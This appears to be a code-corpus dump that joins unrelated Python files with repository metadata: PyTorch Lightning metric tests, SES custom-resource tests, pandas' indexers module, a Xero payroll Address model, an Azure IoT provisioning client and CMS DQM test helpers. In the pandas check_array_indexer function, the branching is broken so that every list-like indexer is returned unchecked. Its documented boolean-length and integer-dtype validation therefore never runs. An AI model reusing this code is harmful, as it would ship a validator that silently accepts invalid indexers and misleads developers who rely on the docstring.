    result_collection_reload(default_root_dir=tmpdir)
@RunIf(min_gpus=1)
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload_1_gpu_ddp(tmpdir):
    # single-GPU DDP variant of the fault-tolerant reload scenario
    result_collection_reload(default_root_dir=tmpdir, accelerator="ddp", gpus=1)
@RunIf(min_gpus=2, special=True)
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload_2_gpus(tmpdir):
    # 2-GPU DDP variant: exercises the rank-0 accumulation / rank shift path
    result_collection_reload(default_root_dir=tmpdir, accelerator="ddp", gpus=2)
def test_metric_collections(tmpdir):
    """This test ensures the metric attribute is properly found even with complex nested metric structure"""

    class TestModel(BoringModel):
        def __init__(self):
            super().__init__()
            # metrics nested at several depths: list, dict, MetricCollection,
            # and a dict-of-list-of-dict combination
            self.metrics_list = ModuleList([DummyMetric() for _ in range(2)])
            self.metrics_dict = ModuleDict({"a": DummyMetric(), "b": DummyMetric()})
            self.metrics_collection_dict = MetricCollection({"a": DummyMetric(), "b": DummyMetric()})
            self.metrics_collection_dict_nested = ModuleDict(
                {"a": ModuleList([ModuleDict({"b": DummyMetric()}), DummyMetric()])}
            )

        def training_step(self, batch, batch_idx):
            loss = super().training_step(batch, batch_idx)
            self.metrics_list[0](batch_idx)
            self.metrics_list[1](batch_idx)
            self.metrics_dict["a"](batch_idx)
            self.metrics_dict["b"](batch_idx)
            self.metrics_collection_dict["a"](batch_idx)
            self.metrics_collection_dict["b"](batch_idx)
            self.metrics_collection_dict_nested["a"][0]["b"](batch_idx)
            self.metrics_collection_dict_nested["a"][1](batch_idx)
            self.log("a", self.metrics_list[0])
            self.log("b", self.metrics_list[1])
            self.log("c", self.metrics_dict["a"])
            self.log("d", self.metrics_dict["b"])
            self.log("e", self.metrics_collection_dict["a"])
            self.log("f", self.metrics_collection_dict["b"])
            self.log("g", self.metrics_collection_dict_nested["a"][0]["b"])
            self.log("h", self.metrics_collection_dict_nested["a"][1])
            return loss

        def on_train_epoch_end(self) -> None:
            # each logged metric must have been resolved to its dotted
            # attribute path on the module
            results = self.trainer.fit_loop.epoch_loop._results
            assert results["training_step.a"].meta.metric_attribute == "metrics_list.0"
            assert results["training_step.b"].meta.metric_attribute == "metrics_list.1"
            assert results["training_step.c"].meta.metric_attribute == "metrics_dict.a"
            assert results["training_step.d"].meta.metric_attribute == "metrics_dict.b"
            assert results["training_step.e"].meta.metric_attribute == "metrics_collection_dict.a"
            assert results["training_step.f"].meta.metric_attribute == "metrics_collection_dict.b"
            assert results["training_step.g"].meta.metric_attribute == "metrics_collection_dict_nested.a.0.b"
            assert results["training_step.h"].meta.metric_attribute == "metrics_collection_dict_nested.a.1"

    model = TestModel()
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, limit_train_batches=2, limit_val_batches=0)
    trainer.fit(model)
| 38.169643 | 116 | 0.63607 |
bb4f5863784c0167762e13d23195d3de4574f7c7 | 3,187 | py | Python | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | import uuid
import json
from mail_from_domain_provider import MailFromDomainProvider
def test_request_schema_has_correct_additional_properties():
    """The request schema must require Domain/Region/MailFromSubdomain and expose the optional properties."""
    schema = MailFromDomainProvider().request_schema

    assert "required" in schema
    required = schema["required"]
    assert "Domain" in required
    assert "Region" in required
    assert "MailFromSubdomain" in required

    assert "properties" in schema
    properties = schema["properties"]
    assert "MailFromSubdomain" in properties
    assert "BehaviorOnMXFailure" in properties
def test_generate_dns_recordsets_returns_empty_when_no_subdomain():
    """An empty MailFromSubdomain must produce no DNS recordsets."""
    provider = MailFromDomainProvider()
    provider.set_request(Request("Create", "example.com", ""), {})

    assert provider.is_valid_request()
    assert provider.domain == "example.com"
    assert provider.mail_from_subdomain == ""
    assert len(provider.generate_dns_recordsets()) == 0
def test_generate_dns_recordsets_returns_values_when_subdomain():
    """A MAIL FROM subdomain must produce exactly the MX and SPF TXT recordsets."""
    provider = MailFromDomainProvider()
    provider.set_request(Request("Create", "example.com", "mail"), {})

    assert provider.is_valid_request()
    assert provider.domain == "example.com"
    assert provider.mail_from_subdomain == "mail"

    recordsets = provider.generate_dns_recordsets()
    print(json.dumps(recordsets, indent=2))
    assert len(recordsets) == 2

    expected = [
        {
            "Name": "mail.example.com.",
            "ResourceRecords": ["10 feedback-smtp.eu-west-1.amazonses.com"],
            "TTL": "60",
            "Type": "MX",
        },
        {
            "Name": "mail.example.com.",
            "ResourceRecords": ["v=spf1 include:amazonses.com ~all"],
            "TTL": "60",
            "Type": "TXT",
        },
    ]
    for recordset in expected:
        assert recordset in recordsets
class Request(dict):
    """A minimal CloudFormation custom-resource request payload used by the tests."""

    def __init__(
        self,
        request_type,
        domain=None,
        mail_from_subdomain="",
        region="eu-west-1",
        physical_resource_id=None,
    ):
        # Properties dict is shared with the payload, so mutating it below
        # (to add Region) also updates the stored request.
        resource_properties = {
            "Domain": domain,
            "MailFromSubdomain": mail_from_subdomain,
        }
        if region:
            resource_properties["Region"] = region

        self.update(
            {
                "RequestType": request_type,
                "ResponseURL": "https://httpbin.org/put",
                "StackId": "arn:aws:cloudformation:us-west-2:EXAMPLE/stack-name/guid",
                "RequestId": "request-%s" % uuid.uuid4(),
                "ResourceType": "Custom::MailFromDomain",
                "LogicalResourceId": "MyMailFromDomain",
                "ResourceProperties": resource_properties,
            }
        )

        # A caller-supplied physical id wins; otherwise synthesize one.
        if physical_resource_id:
            self["PhysicalResourceId"] = physical_resource_id
        else:
            self["PhysicalResourceId"] = "initial-%s" % str(uuid.uuid4())
| 35.411111 | 86 | 0.66081 |
71fd5b6aab821a076772efe5323bf517ac1ad90a | 13,589 | py | Python | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 6 | 2020-09-10T15:03:25.000Z | 2021-04-01T22:48:33.000Z | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 | 2020-02-07T05:05:32.000Z | 2020-05-11T06:06:17.000Z | """
Low-dependency indexing utilities.
"""
import warnings
import numpy as np
from pandas._typing import Any, AnyArrayLike
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
    """
    Check whether a slice object can be interpreted as a positional indexer.

    Parameters
    ----------
    slc : slice

    Returns
    -------
    bool

    Notes
    -----
    A slice that is valid positionally may still be interpreted as a
    label-based slice depending on the index being sliced.
    """
    # Each slot of a positional slice must be an integer or omitted (None).
    return all(
        bound is None or is_integer(bound)
        for bound in (slc.start, slc.stop, slc.step)
    )
def is_list_like_indexer(key) -> bool:
    """
    Check whether ``key`` is a list-like indexer that is *not* a NamedTuple.

    Parameters
    ----------
    key : object

    Returns
    -------
    bool
    """
    if not is_list_like(key):
        return False
    # NamedTuples subclass tuple but are treated as scalar-like indexers:
    # a tuple subclass whose exact type is not ``tuple`` is excluded.
    is_namedtuple_like = isinstance(key, tuple) and type(key) is not tuple
    return not is_namedtuple_like
def is_scalar_indexer(indexer, arr_value) -> bool:
    """
    Return True if we are all scalar indexers.

    Returns
    -------
    bool
    """
    # NOTE(review): despite the name, for 1-D values this wraps a non-tuple
    # indexer and then tests for *empty ndarray* elements -- the exact check
    # is_empty_indexer uses. That looks inconsistent with "scalar"; confirm
    # against callers before changing anything here.
    if arr_value.ndim == 1:
        if not isinstance(indexer, tuple):
            indexer = tuple([indexer])
        return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
    return False
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
    """
    Check whether ``indexer`` selects nothing from ``arr_value``.

    Parameters
    ----------
    indexer : object
    arr_value : np.ndarray

    Returns
    -------
    bool
    """
    # A zero-length list-like is trivially empty.
    if is_list_like(indexer) and not len(indexer):
        return True
    if arr_value.ndim != 1:
        return False
    # Normalize to a tuple, then look for any empty ndarray component.
    if not isinstance(indexer, tuple):
        indexer = tuple([indexer])
    return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> None:
    """
    Validate that ``value`` and ``indexer`` are the same length.

    A special case is allowed for boolean-array indexers: they may be longer
    than ``value`` provided the number of ``True`` entries equals
    ``len(value)``; no exception is raised in that case.

    Parameters
    ----------
    indexer : sequence
        Key for the setitem.
    value : array-like
        Value for the setitem.
    values : array-like
        Values being set into.

    Returns
    -------
    None

    Raises
    ------
    ValueError
        When the indexer is an ndarray or list and the lengths don't match.
    """
    if isinstance(indexer, (np.ndarray, list)):
        if is_list_like(value) and len(indexer) != len(value):
            # A boolean mask is still acceptable when its True-count
            # matches the number of values being assigned.
            mask_matches = (
                isinstance(indexer, np.ndarray)
                and indexer.dtype == np.bool_
                and len(indexer[indexer]) == len(value)
            )
            if not mask_matches:
                raise ValueError(
                    "cannot set using a list-like indexer "
                    "with a different length than the value"
                )
    elif isinstance(indexer, slice):
        if is_list_like(value) and len(values):
            if len(value) != length_of_indexer(indexer, values):
                raise ValueError(
                    "cannot set using a slice indexer with a "
                    "different length than the value"
                )
def validate_indices(indices: np.ndarray, n: int) -> None:
    """
    Perform bounds-checking for an indexer.

    -1 is allowed, indicating a missing value.

    Parameters
    ----------
    indices : ndarray
    n : int
        Length of the array being indexed.

    Raises
    ------
    ValueError
        If any index is below -1.
    IndexError
        If any index is >= ``n``.
    """
    # Nothing to validate for an empty indexer.
    if not len(indices):
        return
    smallest = indices.min()
    if smallest < -1:
        msg = f"'indices' contains values less than allowed ({smallest} < -1)"
        raise ValueError(msg)
    if indices.max() >= n:
        raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int):
    """
    Attempt to convert ``indices`` into valid, positive indices.

    Negative indices are translated to positive ones; any index that is
    out of bounds after translation raises.

    Parameters
    ----------
    indices : array-like
        Array of indices to convert.
    n : int
        Number of elements in the array being indexed.

    Returns
    -------
    array-like
        Positive indices corresponding to the input.

    Raises
    ------
    IndexError
        If a converted index exceeds ``n`` or remains negative.
    """
    if isinstance(indices, list):
        indices = np.array(indices)
        if not len(indices):
            # np.array([]) is float64, which would break integer indexing;
            # return a correctly-typed empty array instead.
            return np.empty(0, dtype=np.intp)

    negative = indices < 0
    if negative.any():
        # Copy before shifting so the caller's array is left untouched.
        indices = indices.copy()
        indices[negative] += n

    out_of_bounds = (indices >= n) | (indices < 0)
    if out_of_bounds.any():
        raise IndexError("indices are out-of-bounds")
    return indices
# -----------------------------------------------------------
# Unsorted
def length_of_indexer(indexer, target=None) -> int:
    """
    Return the expected length of ``target[indexer]``.

    Returns
    -------
    int
    """
    if target is not None and isinstance(indexer, slice):
        n = len(target)
        start, stop, step = indexer.start, indexer.stop, indexer.step
        # Normalize each slot to a concrete non-negative value.
        if start is None:
            start = 0
        elif start < 0:
            start += n
        if stop is None or stop > n:
            stop = n
        elif stop < 0:
            stop += n
        if step is None:
            step = 1
        elif step < 0:
            # Walk the slice forwards: swap and shift the endpoints.
            start, stop = stop + 1, start + 1
            step = -step
        return (stop - start + step - 1) // step
    if isinstance(indexer, (ABCSeries, ABCIndexClass, np.ndarray, list)):
        if isinstance(indexer, list):
            indexer = np.array(indexer)
        if indexer.dtype == bool:
            # GH#25774: a boolean mask selects its True entries.
            return indexer.sum()
        return len(indexer)
    if not is_list_like_indexer(indexer):
        return 1
    raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result):
    """
    Emit the deprecation warning for multi-dimensional indexing on a
    1-D Series/Index.

    GH#27125: an indexer like ``idx[:, None]`` expands dimensionality, which
    cannot be represented as an Index, so an ndarray is returned instead --
    a behaviour deprecated in GH#30588.
    """
    if np.ndim(result) <= 1:
        return
    warnings.warn(
        "Support for multi-dimensional indexing (e.g. `index[:, None]`) "
        "on an Index is deprecated and will be removed in a future "
        "version. Convert to a numpy array before indexing instead.",
        DeprecationWarning,
        stacklevel=3,
    )
def unpack_1tuple(tup):
    """
    Unwrap a length-1 tuple/list whose only element is a slice, returning
    the bare slice; everything else passes through unchanged.

    Notes
    -----
    The list form is deprecated (GH#31299).
    """
    # Only a single-item container holding a slice is unwrapped; without a
    # MultiIndex this is the one 1-tuple we can still handle
    # (see test_1tuple_without_multiindex).
    if len(tup) != 1 or not isinstance(tup[0], slice):
        return tup

    if isinstance(tup, list):
        # GH#31299
        warnings.warn(
            "Indexing with a single-item list containing a "
            "slice is deprecated and will raise in a future "
            "version. Pass a tuple instead.",
            FutureWarning,
            stacklevel=3,
        )
    return tup[0]
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
"""
Check if `indexer` is a valid array indexer for `array`.
For a boolean mask, `array` and `indexer` are checked to have the same
length. The dtype is validated, and if it is an integer or boolean
ExtensionArray, it is checked if there are missing values present, and
it is converted to the appropriate numpy array. Other dtypes will raise
an error.
Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
through as is.
.. versionadded:: 1.0.0
Parameters
----------
array : array-like
The array that is being indexed (only used for the length).
indexer : array-like or list-like
The array-like that's used to index. List-like input that is not yet
a numpy array or an ExtensionArray is converted to one. Other input
types are passed through as is.
Returns
-------
numpy.ndarray
The validated indexer as a numpy array that can be used to index.
Raises
------
IndexError
When the lengths don't match.
ValueError
When `indexer` cannot be converted to a numpy ndarray to index
(e.g. presence of missing values).
See Also
--------
api.types.is_bool_dtype : Check if `key` is of boolean dtype.
Examples
--------
When checking a boolean mask, a boolean ndarray is returned when the
arguments are all valid.
>>> mask = pd.array([True, False])
>>> arr = pd.array([1, 2])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
An IndexError is raised when the lengths don't match.
>>> mask = pd.array([True, False, True])
>>> pd.api.indexers.check_array_indexer(arr, mask)
Traceback (most recent call last):
...
IndexError: Boolean index has wrong length: 3 instead of 2.
NA values in a boolean array are treated as False.
>>> mask = pd.array([True, pd.NA])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
A numpy boolean mask will get passed through (if the length is correct):
>>> mask = np.array([True, False])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
Similarly for integer indexers, an integer ndarray is returned when it is
a valid indexer, otherwise an error is (for integer indexers, a matching
length is not required):
>>> indexer = pd.array([0, 2], dtype="Int64")
>>> arr = pd.array([1, 2, 3])
>>> pd.api.indexers.check_array_indexer(arr, indexer)
array([0, 2])
>>> indexer = pd.array([0, pd.NA], dtype="Int64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
ValueError: Cannot index with an integer indexer containing NA values
For non-integer/boolean dtypes, an appropriate error is raised:
>>> indexer = np.array([0., 2.], dtype="float64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
IndexError: arrays used as indices must be of integer or boolean type
"""
from pandas.core.construction import array as pd_array
# whathever is not an array-like is returned as-is (possible valid array
# indexers that are not array-like: integer, slice, Ellipsis, None)
# In this context, tuples are not considered as array-like, as they have
# a specific meaning in indexing (multi-dimensional indexing)
if is_list_like(indexer):
if isinstance(indexer, tuple):
return indexer
else:
return indexer
# convert list-likes to array
if not is_array_like(indexer):
indexer = pd_array(indexer)
if len(indexer) == 0:
# empty list is converted to float array by pd.array
indexer = np.array([], dtype=np.intp)
dtype = indexer.dtype
if is_bool_dtype(dtype):
if is_extension_array_dtype(dtype):
indexer = indexer.to_numpy(dtype=bool, na_value=False)
else:
indexer = np.asarray(indexer, dtype=bool)
# GH26658
if len(indexer) != len(array):
raise IndexError(
f"Boolean index has wrong length: "
f"{len(indexer)} instead of {len(array)}"
)
elif is_integer_dtype(dtype):
try:
indexer = np.asarray(indexer, dtype=np.intp)
except ValueError as err:
raise ValueError(
"Cannot index with an integer indexer containing NA values"
) from err
else:
raise IndexError("arrays used as indices must be of integer or boolean type")
return indexer
| 28.48847 | 88 | 0.592832 |
5faf7f57b4a4387c0c8991220b31354973078371 | 5,284 | py | Python | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 77 | 2020-02-16T03:50:18.000Z | 2022-03-11T03:53:26.000Z | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 50 | 2020-04-06T10:15:52.000Z | 2022-03-29T21:27:50.000Z | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 27 | 2020-06-04T11:16:17.000Z | 2022-03-19T06:27:36.000Z | # coding: utf-8
"""
Xero Payroll UK
This is the Xero Payroll API for orgs in the UK region. # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class Address(BaseModel):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> declared OpenAPI type.
    openapi_types = {
        "address_line1": "str",
        "address_line2": "str",
        "city": "str",
        "post_code": "str",
        "country_name": "str",
    }

    # Python attribute name -> JSON key used on the wire.
    attribute_map = {
        "address_line1": "addressLine1",
        "address_line2": "addressLine2",
        "city": "city",
        "post_code": "postCode",
        "country_name": "countryName",
    }

    def __init__(
        self,
        address_line1=None,
        address_line2=None,
        city=None,
        post_code=None,
        country_name=None,
    ):  # noqa: E501
        """Address - a model defined in OpenAPI"""  # noqa: E501
        self._address_line1 = None
        self._address_line2 = None
        self._city = None
        self._post_code = None
        self._country_name = None
        self.discriminator = None

        # address_line1, city and post_code are required: their property
        # setters below raise ValueError on None, so they are assigned
        # unconditionally.  The optional fields are only assigned when given.
        self.address_line1 = address_line1
        if address_line2 is not None:
            self.address_line2 = address_line2
        self.city = city
        self.post_code = post_code
        if country_name is not None:
            self.country_name = country_name

    @property
    def address_line1(self):
        """Gets the address_line1 of this Address.  # noqa: E501

        Address line 1 for employee home address  # noqa: E501

        :return: The address_line1 of this Address.  # noqa: E501
        :rtype: str
        """
        return self._address_line1

    @address_line1.setter
    def address_line1(self, address_line1):
        """Sets the address_line1 of this Address.

        Address line 1 for employee home address  # noqa: E501

        :param address_line1: The address_line1 of this Address.  # noqa: E501
        :type: str
        """
        # Required field: reject None.
        if address_line1 is None:
            raise ValueError(
                "Invalid value for `address_line1`, must not be `None`"
            )  # noqa: E501

        self._address_line1 = address_line1

    @property
    def address_line2(self):
        """Gets the address_line2 of this Address.  # noqa: E501

        Address line 2 for employee home address  # noqa: E501

        :return: The address_line2 of this Address.  # noqa: E501
        :rtype: str
        """
        return self._address_line2

    @address_line2.setter
    def address_line2(self, address_line2):
        """Sets the address_line2 of this Address.

        Address line 2 for employee home address  # noqa: E501

        :param address_line2: The address_line2 of this Address.  # noqa: E501
        :type: str
        """
        # Optional field: no validation.
        self._address_line2 = address_line2

    @property
    def city(self):
        """Gets the city of this Address.  # noqa: E501

        Suburb for employee home address  # noqa: E501

        :return: The city of this Address.  # noqa: E501
        :rtype: str
        """
        return self._city

    @city.setter
    def city(self, city):
        """Sets the city of this Address.

        Suburb for employee home address  # noqa: E501

        :param city: The city of this Address.  # noqa: E501
        :type: str
        """
        # Required field: reject None.
        if city is None:
            raise ValueError(
                "Invalid value for `city`, must not be `None`"
            )  # noqa: E501

        self._city = city

    @property
    def post_code(self):
        """Gets the post_code of this Address.  # noqa: E501

        PostCode for employee home address  # noqa: E501

        :return: The post_code of this Address.  # noqa: E501
        :rtype: str
        """
        return self._post_code

    @post_code.setter
    def post_code(self, post_code):
        """Sets the post_code of this Address.

        PostCode for employee home address  # noqa: E501

        :param post_code: The post_code of this Address.  # noqa: E501
        :type: str
        """
        # Required field: reject None.
        if post_code is None:
            raise ValueError(
                "Invalid value for `post_code`, must not be `None`"
            )  # noqa: E501

        self._post_code = post_code

    @property
    def country_name(self):
        """Gets the country_name of this Address.  # noqa: E501

        Country of HomeAddress  # noqa: E501

        :return: The country_name of this Address.  # noqa: E501
        :rtype: str
        """
        return self._country_name

    @country_name.setter
    def country_name(self, country_name):
        """Sets the country_name of this Address.

        Country of HomeAddress  # noqa: E501

        :param country_name: The country_name of this Address.  # noqa: E501
        :type: str
        """
        # Optional field: no validation.
        self._country_name = country_name
| 26.552764 | 78 | 0.585352 |
0cb4596c854b8f1e86e007ab7c65d62740627392 | 3,523 | py | Python | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 35 | 2018-12-01T05:42:30.000Z | 2021-03-10T12:23:41.000Z | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 81 | 2018-11-20T20:01:43.000Z | 2019-09-06T23:57:17.000Z | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 18 | 2019-03-19T18:53:43.000Z | 2021-01-10T09:47:24.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
This module contains one of the implementations of the Provisioning Device Client which uses Symmetric Key authentication.
"""
import logging
from threading import Event
from .abstract_provisioning_device_client import AbstractProvisioningDeviceClient
from .abstract_provisioning_device_client import log_on_register_complete
from .internal.polling_machine import PollingMachine
logger = logging.getLogger(__name__)
class ProvisioningDeviceClient(AbstractProvisioningDeviceClient):
    """
    Client which can be used to run the registration of a device with provisioning service
    using Symmetric Key authentication.
    """

    def __init__(self, provisioning_pipeline):
        """
        Initializer for the Provisioning Client.
        NOTE : This initializer should not be called directly.
        Instead, the class methods that start with `create_from_` should be used to create a client object.
        :param provisioning_pipeline: The protocol pipeline for provisioning. As of now this only supports MQTT.
        """
        super(ProvisioningDeviceClient, self).__init__(provisioning_pipeline)
        # The polling machine drives the register/cancel state transitions
        # over the pipeline and invokes our callbacks when done.
        self._polling_machine = PollingMachine(provisioning_pipeline)

    def register(self):
        """
        Register the device with the with thw provisioning service
        This is a synchronous call, meaning that this function will not return until the registration
        process has completed successfully or the attempt has resulted in a failure. Before returning
        the client will also disconnect from the provisioning service.
        If a registration attempt is made while a previous registration is in progress it may throw an error.
        """
        logger.info("Registering with Provisioning Service...")
        # Event used to block this thread until the async callback fires.
        register_complete = Event()

        # hack to work aroud lack of the "nonlocal" keyword in 2.7. The non-local "context"
        # object can be read and modified inside the inner function.
        # (https://stackoverflow.com/a/28433571)
        class context:
            registration_result = None

        def on_register_complete(result=None, error=None):
            # Stash the result where the outer scope can see it, then unblock.
            log_on_register_complete(result, error)
            context.registration_result = result
            register_complete.set()

        self._polling_machine.register(callback=on_register_complete)

        # Block until on_register_complete runs (no timeout: waits forever
        # if the callback is never invoked).
        register_complete.wait()
        return context.registration_result

    def cancel(self):
        """
        This is a synchronous call, meaning that this function will not return until the cancellation
        process has completed successfully or the attempt has resulted in a failure. Before returning
        the client will also disconnect from the provisioning service.
        In case there is no registration in process it will throw an error as there is
        no registration process to cancel.
        """
        logger.info("Cancelling the current registration process")
        # Event used to block this thread until the cancel callback fires.
        cancel_complete = Event()

        def on_cancel_complete():
            cancel_complete.set()
            logger.info("Successfully cancelled the current registration process")

        self._polling_machine.cancel(callback=on_cancel_complete)
        cancel_complete.wait()
| 44.594937 | 122 | 0.692875 |
58353348c1936db3db8e2d084c6681b73af829d9 | 6,024 | py | Python | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 3 | 2018-08-24T19:10:26.000Z | 2019-02-19T11:45:32.000Z | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 7 | 2016-07-17T02:34:54.000Z | 2019-08-13T07:58:37.000Z | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 5 | 2018-08-21T16:37:52.000Z | 2020-01-09T13:33:17.000Z | #!/usr/bin/env python
from builtins import range
import FWCore.ParameterSet.Config as cms
def createElements():
elements = list()
for i in range(0,10):
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Foo"+str(i)),
title = cms.untracked.string("Foo"+str(i)),
value = cms.untracked.double(i),
values = cms.untracked.vdouble()))
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Bar0"),
title = cms.untracked.string("Bar0"),
value = cms.untracked.double(-1),
values = cms.untracked.vdouble([i for i in range(0,11)])))
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Bar1"),
title = cms.untracked.string("Bar1"),
value = cms.untracked.double(-1),
values = cms.untracked.vdouble([10 - i for i in range(0,11)])))
return elements
def createReadRunElements():
readRunElements = list()
for i in range(0,10):
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble(i),
entries = cms.untracked.vdouble(1)
))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar0"),
means = cms.untracked.vdouble(7),
entries = cms.untracked.vdouble(55)))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar1"),
means = cms.untracked.vdouble(3),
entries = cms.untracked.vdouble(55)))
return readRunElements
def createReadLumiElements():
readLumiElements = list()
for i in range(0,10):
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble([i for x in range(0,10)]),
entries=cms.untracked.vdouble([1 for x in range(0,10)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar0"),
means = cms.untracked.vdouble([7 for x in range(0,10)]),
entries=cms.untracked.vdouble([55 for x in range(0,10)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar1"),
means = cms.untracked.vdouble([3 for x in range(0,10)]),
entries=cms.untracked.vdouble([55 for x in range(0,10)])
))
return readLumiElements
####### MERGED FILES SECTION #######
def createReadRunElements_merged_file1_file2():
readRunElements = list()
for i in range(0,10):
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble(i),
entries = cms.untracked.vdouble(2)
))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar0"),
means = cms.untracked.vdouble(7),
entries = cms.untracked.vdouble(110)))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar1"),
means = cms.untracked.vdouble(3),
entries = cms.untracked.vdouble(110)))
return readRunElements
def createReadLumiElements_merged_file1_file2():
readLumiElements = list()
for i in range(0,10):
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble([i for x in range(0,20)]),
entries=cms.untracked.vdouble([1 for x in range(0,20)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar0"),
means = cms.untracked.vdouble([7 for x in range(0,20)]),
entries=cms.untracked.vdouble([55 for x in range(0,20)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar1"),
means = cms.untracked.vdouble([3 for x in range(0,20)]),
entries=cms.untracked.vdouble([55 for x in range(0,20)])
))
return readLumiElements
| 62.103093 | 107 | 0.452689 |
f90fa035f3ada405152e9f8ad950e13282b58b74 | 9,792 | py | Python | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
